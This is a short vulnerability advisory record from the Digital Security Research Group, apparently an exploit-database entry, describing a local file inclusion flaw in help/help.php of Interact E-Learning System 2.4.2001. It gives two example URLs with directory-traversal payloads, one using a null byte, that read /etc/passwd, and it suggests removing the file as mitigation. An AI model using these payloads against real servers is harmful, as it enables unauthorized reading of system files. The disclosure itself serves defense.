vendor:
Interact E-Learning System
by:
Digital Security Research Group [DSecRG]
6.4
CVSS
MEDIUM
Local File Include
22
CWE
Product Name: Interact E-Learning System
Affected Version From: 2.4.2001
Affected Version To: 2.4.2001
Patch Exists: YES
Related CWE: N/A
CPE: a:interact_e-learning_system:interact_e-learning_system
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
DSECRG-08-31
Interact E-Learning System system has local file include vulnerability in script help/help.php. Vulnerable GET parameters 'module' and 'file'. An example of the exploit is http://[server]/[installdir]/help/help.php?module=../../../../../../../../../../../../../etc/passwd%00 and http://[server]/[installdir]/help/help.php?file=../../../../../../../../../../../../../etc/passwd.
Mitigation:
Remove the help/help.php file from the installation.